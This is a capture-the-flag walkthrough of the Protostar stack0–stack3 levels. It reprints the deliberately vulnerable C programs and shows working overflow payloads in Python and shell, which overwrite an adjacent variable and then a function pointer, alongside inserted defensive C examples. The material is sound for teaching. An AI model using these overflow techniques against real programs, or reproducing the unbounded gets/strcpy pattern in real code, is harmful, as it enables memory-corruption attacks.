Stack Zero
This level introduces the concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.
This level is at /opt/protostar/bin/stack0
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
The key is these three lines:
char buffer[64];
modified = 0;
gets(buffer);
In short, entering 65 characters is enough: the first 64 fill buffer and the 65th lands on modified.
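The defensive counterpart of those three lines, as an added example that is not part of the Protostar source or of this writeup: the same 64-byte buffer next to a control variable, but filled through a length-checked copy instead of gets(), so a 65-character line is refused instead of being written over modified. The names frame, read_line_bounded, try_input and try_repeated are chosen for this example; the layout is fixed in a struct so that the adjacency the writeup relies on does not depend on the compiler's stack layout.

```c
/* Added example: the length-checked counterpart of stack0's gets(buffer).
 * The names (frame, read_line_bounded, try_input, try_repeated) are chosen
 * for this example and are not part of the Protostar binaries. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

/* Copy one line (up to '\n' or the end of src) into dst, which has room for
 * dst_size bytes including the terminating NUL.  Returns the number of bytes
 * copied, or -1 if the line does not fit; on failure nothing is written to
 * dst at all.  gets() has no such check, which is the whole bug in stack0. */
int read_line_bounded(const char *src, size_t src_len, char *dst, size_t dst_size)
{
    size_t n = 0;
    while (n < src_len && src[n] != '\n')
        n++;
    if (dst_size == 0 || n >= dst_size)     /* need n + 1 bytes for the NUL */
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

/* Same shape as stack0's frame: the 64-byte buffer immediately followed by
 * the control variable.  A struct makes that adjacency explicit, whereas on
 * the real stack it is whatever the compiler decided. */
struct frame {
    char buffer[BUF_SIZE];
    volatile int modified;
};

/* Feed one line of input through the bounded copy.  Returns 1 if `modified`
 * was disturbed, 0 if it is intact, -1 if the line was refused as too long. */
int try_input(const char *input, size_t len)
{
    struct frame f;
    f.modified = 0;
    memset(f.buffer, 0, sizeof f.buffer);
    if (read_line_bounded(input, len, f.buffer, sizeof f.buffer) < 0)
        return -1;
    return f.modified != 0;
}

/* Constructed input helper: `count` copies of `c` followed by a newline,
 * which is what the writeup's python "A" * 65 pipeline produces. */
int try_repeated(char c, size_t count)
{
    char tmp[256];
    if (count + 1 >= sizeof tmp)
        return -1;
    memset(tmp, c, count);
    tmp[count] = '\n';
    return try_input(tmp, count + 1);
}

/* Stand-alone use: read a line from stdin with a bounded read and report.
 * fgets() stops at sizeof line - 1 bytes, so the read itself cannot overflow. */
int main(void)
{
    char line[256];
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    int r = try_input(line, strlen(line));
    puts(r < 0 ? "line too long, refused" : r ? "modified was changed" : "modified intact");
    return 0;
}
```

Piping the writeup's 65 A's into this program prints "line too long, refused"; 63 A's fit (the 64th byte is the NUL) and leave modified at zero.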
user@protostar:/tmp$ echo "print \"A\" * 65"
print "A" * 65
user@protostar:/tmp$ echo "print \"A\" * 65" > stack0.py
user@protostar:/tmp$ python stack0.py | /opt/protostar/bin/stack0
you have changed the 'modified' variable
user@protostar:/tmp$
Stack One
This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.
This level is at /opt/protostar/bin/stack1
Hints
- If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
- Protostar is little endian
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h> /* for errx() */
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
Here we need modified == 0x61626364.
Note the little-endian byte order.
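Why the four payload bytes are reversed, and what the strcpy() from argv[1] (stack1) or from getenv() (stack2) should have checked, as an added example that is not part of Protostar or this writeup. Protostar is 32-bit x86, so the least significant byte of an int sits at the lowest address; strcpy() fills memory from low address to high, so the first byte it writes becomes the low byte of the value. All function names here (host_is_little_endian, u32_to_le_bytes, le_bytes_to_u32, bytes_equal_le, copy_checked, copy_into_buffer64) are chosen for the example.

```c
/* Added example (not part of Protostar or this writeup): little-endian byte
 * order as it applies to the stack1/stack2 payloads, plus a checked
 * replacement for the unbounded strcpy().  Names are chosen for the example. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Does this host store the least significant byte at the lowest address?
 * On Protostar (32-bit x86) the answer is yes. */
int host_is_little_endian(void)
{
    uint32_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);            /* byte at the lowest address */
    return first == 1;
}

/* The 4 bytes a uint32 occupies in memory on a little-endian host, lowest
 * address first: 0x61626364 -> 64 63 62 61, i.e. "dcba". */
void u32_to_le_bytes(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Inverse: the value a little-endian CPU reads from 4 consecutive bytes.
 * This is what the program sees after strcpy() has written those bytes over
 * `modified`: the first byte copied is the least significant one. */
uint32_t le_bytes_to_u32(const void *p)
{
    const unsigned char *b = p;
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8)
         | ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Does v, laid out little-endian, equal the 4 bytes at expect?  Lets the
 * stack1 payload "\x64\x63\x62\x61" be checked against 0x61626364. */
int bytes_equal_le(uint32_t v, const char *expect)
{
    unsigned char b[4];
    u32_to_le_bytes(v, b);
    return memcmp(b, expect, 4) == 0;
}

/* Checked counterpart of strcpy(buffer, argv[1]) / strcpy(buffer, variable):
 * refuse a source that does not fit instead of writing past dst.
 * Returns 0 on success, -1 if src plus its NUL is longer than dst_size. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = 0;
    while (n < dst_size && src[n] != '\0')   /* never scan past dst_size */
        n++;
    if (n >= dst_size)
        return -1;
    memcpy(dst, src, n + 1);                 /* includes the NUL */
    return 0;
}

/* Stand-in for the 64-byte buffer of stack1/stack2. */
int copy_into_buffer64(const char *src)
{
    char buffer[64];
    return copy_checked(buffer, sizeof buffer, src);
}

int main(void)
{
    unsigned char b[4];
    u32_to_le_bytes(0x61626364u, b);
    printf("little-endian host: %d\n", host_is_little_endian());
    printf("0x61626364 in memory: %02x %02x %02x %02x\n", b[0], b[1], b[2], b[3]);
    printf("copy of \"dcba\" into buffer[64]: %d\n", copy_into_buffer64("dcba"));
    return 0;
}
```

With copy_checked() in place of strcpy(), the writeup's 68-byte argument is refused outright, so the four trailing bytes never reach modified regardless of their order.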
user@protostar:/tmp$ more stack1.py
padding = "A" * 64
modified = "\x64\x63\x62\x61"
print (padding + modified)
user@protostar:/tmp$ python stack1.py > st1
user@protostar:/tmp$ /opt/protostar/bin/stack1 "$(< st1)"
you have correctly got the variable to the right value
user@protostar:/tmp$
Stack Two
Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h> /* for errx() */
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
This one is mainly about how to set the environment variable.
user@protostar:/tmp$ more stack2.py
padding = "A" * 64
modified = "\x0a\x0d\x0a\x0d"
print (padding + modified)
user@protostar:/tmp$ python stack2.py > st2
user@protostar:/tmp$ export GREENIE=$(cat st2)
user@protostar:/tmp$ echo $GREENIE
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
user@protostar:/tmp$ /opt/protostar/bin/stack2
you have correctly modified the variable
user@protostar:/tmp$
Stack Three
Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP).
Hints
- both gdb and objdump are your friends in determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
The key is finding where void win() is.
You can use objdump -t. From the objdump manual:
-t, --syms
Print the symbol table entries of the file. This is similar to the information provided by the nm program, although the display format is different.
user@protostar:/tmp$ objdump -t /opt/protostar/bin/stack3 | grep win
08048424 g F .text 00000014 win
So it is at 0x08048424.
user@protostar:/tmp$ more stack3.py
padding = "A" * 64
win = "\x24\x84\x04\x08"
print (padding + win)
user@protostar:/tmp$ python stack3.py | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
user@protostar:/tmp$
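From the defending side, what stack3 illustrates is an indirect call through a pointer that sits on the stack right behind an unbounded buffer. As an added example that is not from Protostar or this writeup, here is one mitigation that holds even after the pointer has been corrupted: before the call, compare the pointer against the table of functions it may legitimately hold and refuse anything else. Compilers offer the same idea at scale (clang's -fsanitize=cfi, gcc's -fcf-protection on CET hardware); doing it by hand keeps the check visible. The names handler_fn, allowed_targets, call_checked, call_checked_raw and win_call_count are chosen for the example; win() mirrors the level's function but counts its calls so the result can be checked.

```c
/* Added example: validate an indirect-call target before using it.
 * Not part of Protostar; names are chosen for this example. */
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

typedef void (*handler_fn)(void);

static int win_calls;                   /* how often win() actually ran */

void win(void)
{
    win_calls++;
    puts("code flow successfully changed");
}

void greet(void)
{
    puts("hello");
}

int win_call_count(void)
{
    return win_calls;
}

/* Every function the pointer may legitimately point at.  A value such as
 * 0x41414141 left behind by a buffer full of 'A', or any other stray
 * address, is not in this table and is therefore never called. */
static const handler_fn allowed_targets[] = { win, greet };

/* Call fp only if it is one of the allowed targets.  Returns 1 if the call
 * was made, 0 if fp was NULL or not an allowed target. */
int call_checked(handler_fn fp)
{
    if (fp == NULL)
        return 0;
    for (size_t i = 0; i < sizeof allowed_targets / sizeof allowed_targets[0]; i++) {
        if (fp == allowed_targets[i]) {
            fp();
            return 1;
        }
    }
    fprintf(stderr, "refusing to call unexpected target\n");
    return 0;
}

/* The case that matters: a pointer whose bits came from input, given as an
 * integer so that the comparison happens without ever dereferencing it. */
int call_checked_raw(uintptr_t raw)
{
    return call_checked((handler_fn)raw);
}

int main(void)
{
    handler_fn fp = win;
    printf("win:        %d\n", call_checked(fp));                /* 1 */
    printf("0x41414141: %d\n", call_checked_raw(0x41414141u));   /* 0 */
    return 0;
}
```

The check is only as good as the table: it must list every legitimate target and nothing else, and the table itself must not be writable from the same overflow, which is why it is declared const and lives outside the stack frame.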